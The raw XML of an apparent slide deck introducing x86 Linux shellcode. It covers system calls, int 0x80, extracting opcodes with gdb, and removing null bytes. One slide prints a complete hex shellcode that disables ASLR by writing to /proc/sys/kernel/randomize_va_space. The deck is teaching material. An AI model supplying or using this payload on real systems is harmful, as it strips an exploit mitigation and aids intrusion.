              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>hlt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x1,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x80</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2" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="457200"/>
            <a:ext cx="7745040" cy="5668560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>As you can see, the _exit(2) function actually executes two syscalls: first number 0xfc (252), _exit_group(2), and then number 1, _exit(2). The _exit_group(2) syscall is similar to _exit(2) but has the purpose to terminate all threads in the current thread group. Anyway, only the second syscall is required by our shellcode. So let's extract the opcodes with gdb:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233"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234" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{9121A191-7151-41E1-A151-B1916151C141}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2743200"/>
            <a:ext cx="4266720" cy="3809520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>(gdb) x/4bx _exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0x400ced9c &lt;_exit&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>(gdb) x/7bx _exit+11</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0x400ceda7 &lt;_exit+11&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0x8b 0x5c 0x24 0x04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0xb8 0x01 0x00 0x00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0xcd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0x80 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095880" y="3620520"/>
            <a:ext cx="2742840" cy="2009880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Once again, to make the shellcode work in real-world applications, we will need to remove all those null</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>bytes!</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Question?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238"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239" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{31A11111-2151-41A1-91F1-81F10181E1A1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn dur="indefinite" id="11" nodeType="tmRoot" restart="never">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="12" nodeType="mainSeq">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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>~&gt; linux x86 ASLR DeActivation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101"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02" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{A1510111-81B1-41B1-B141-81C131D131A1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Introduction a Shellcode </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="2819520"/>
            <a:ext cx="8000640" cy="3200040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="d9d9d9"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80"</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The easiest and fastest way to execute complex tasks in assembler ( or syscalls, as their friends call them )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>System calls constitute the interface between user mode and kernel mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>, system calls are the means by which userland applications obtain system services from the kernel, such as </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>managing the filesystem, starting new processes,    </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>accessing devices, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106"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07" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{71417131-B141-4181-8131-81E101E12191}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Linux System Call's</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>triggering the 0x80 software interrupt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>using the libc wrapper functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110"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11" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{811131A1-6121-41E1-91B1-B1D1D1D1C131}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>There are normally two ways to execute a syscall</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>When the CPU receives a 0x80 interrupt, it enters kernel mode and executes the requested function, getting the appropriate handler through the Interrupt Descriptor Table.</a:t>
            </a:r>
